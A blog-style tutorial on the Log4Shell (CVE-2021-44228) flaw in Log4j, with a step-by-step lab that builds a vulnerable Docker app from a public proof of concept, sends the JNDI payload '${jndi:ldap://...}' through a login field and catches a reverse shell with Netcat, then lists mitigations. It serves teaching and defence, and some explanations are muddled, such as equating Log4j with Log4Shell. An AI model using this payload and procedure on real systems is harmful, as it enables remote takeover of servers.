Log4j Vulnerability

On December 9th, 2021, the world was made aware of the single, biggest, most critical vulnerability as CVE-2021–44228, affecting the java based logging utility log4j.

What Is Log4j?

Log4j is also known as Log4Shell, an internet vulnerability that affects millions of computers, involving an obscure but nearly ubiquitous piece of software, Log4j. The software is used to record all manner of activities that go on under the hood in a wide range of computer systems.

Log4j is a powerful logging facility used to monitor and track system calls in web servers to log activities. The Log4j code is created by an open-source project managed by the Apache Software Foundation. Several companies use the Log4j library worldwide to enable logging and configure a wide set of applications. The Log4j flaw allows hackers to run any code on vulnerable machines or hack into any application directly using the Log4j framework.

Apache software foundation assigned a maximum severity score of 10/10. The vulnerability allows attackers to remote code execution and the payload string looks like “${jndi:ldap://attacker.com/a}”.

What does log4j do?

Log4j records events — errors and routine system operations — and communicates diagnostic messages about them to system administrators and users.

Ex: We usually get 404 bad errors, when typing or clicking on any bad links . The web server running the domain of the web link we tried to get tells us that there’s no such webpage. It also records that event in a log for the server’s system administrators using Log4j.

How does log4j work?

Log4shell works by abusing a feature in Log4j that allows users to specify custom code for formatting a log message.

For example, This feature allows log4j to log not only the username but also the real name of a person at his time for attempting to login to a server if a separate server holds a directory that links both usernames and real names.

For this to happen, the Log4j server has to communicate with the server holding the real names.

Log4j allows third-party servers to submit software code that can perform all kinds of actions on the targeted computer. This opens the door for evil activities such as stealing sensitive information, taking control of the targeted system, and slipping malicious content to other users communicating with the affected server.

Five things that must know about log4j:

1. You may still be vulnerable even if your project is not based on Java.

• Many tech stacks are vulnerable because so many tools use the Log4js including infrastructure, dev-tools, and CI/CD products.

2. Log4Shell will be here for a while.

• It cannot be upgraded in a few days as it is the core component of many products like network devices, management consoles, and enterprise software and hardware.

3. WAFs can’t protect in full.

• The exploit can come through any protocol including API, DNS, or UDP. At this time WAFs are helpless.

4. Companies may still be vulnerable even if the vulnerable host is deep inside its network perimeter.

5. There will be breaches.

Let’s try to set up a vulnerable lab :

STEP-1

• At first in a target machine, we have to download log4j shell, I have done that with the git cloning process.
• git clone https://github.com/kozmer/log4j-shell-poc.git

STEP-2

• Once the git clone was completed then we have to enter it into that directory, for that, I have used the command.
• cd /home/kali/log4j-shell-poc
• After entering into the log4j directory we have to run the docker command
• docker build -t log4j-shell-poc.

STEP-3

• After that run the second command on the GitHub page.
• Docker run –network host log4j-shell-poc.
• These commands will enable us to use the docker file with a vulnerable app.

STEP-4

• Once we complete this command then we have to check whether our web app is built or not.
• For that, we have to browse our machine IP including the port number i.e 8080.
• machine ip:8080
• At last, we found our vulnerable website.

EXPLOITATION

Now through attacker machine, we have to try to exploit that vulnerable app

STEP-1

• Download log4j shell from GitHub, in the same process that we had done in the lab setup (just ignore this step if you are using the same machine as a target and an attacker).

STEP-2

• Now we need to install the Java JDK version on the machine.
• This can be downloaded at the following link.

Index of java-local/jdk/8u202-b08

STEP-3

• Now go to the download folder and unzip the JDK file by executing the following command and later move the extracted file to the /usr/bin folder.

STEP-4

• After completing these steps we have to exit from the /usr/bin directory and enter into the log4j shell.
• Let’s check the content of that directory
• Here I found something interesting that is poc.py.

STEP-5

• I have opened that file poc.py by using the command: sudo nano poc.py.
• Here we need to modify ‘./jdk1.8.2.20/’ to ‘/usr/bin/jdk1.8.0_202/.
• What we have done here is we have changed the path of the java location and the java version in the script.

• Now let’s initiate a Netcat listener

STEP-6

• In a terminal make sure you are in the log4j-shell-poc directory when executing the command
• python3 poc.py — userip 0.0.0.0 — webport 8000 — lport 9001

STEP-7

• This script started the malicious local LDAP server.
• Now let’s copy the send me a command that we got from the above image. ${jndi:ldap://192.168.29.163:1389/a}.
• Paste it in the username field of the browser. This will be our payload.
• In the password field, we can provide anything.

STEP-8

• Click on the login button to execute the payload and get back to the Netcat windows where we should get a reverse shell

We are finally inside that vulnerable web app

MITIGATIONS:

• Patching: Internet-facing machines, devices, and services should be patched and updated as soon as the patch/update is released.
• Visibility: Get an overview of systems and software that may be using Log4j in your environment. Not every Java-dependent machine is vulnerable, but sometimes an old machine, IoT device, or forgotten web service may cause extreme disorder, so make sure to have at least visibility.
• Isolation: Sometimes patching isn’t available right away. Vulnerable devices and services connected/facing the internet should be isolated from it, and mitigation measures should be applied.
• Use web application firewalls (WAFs) to filter malicious requests.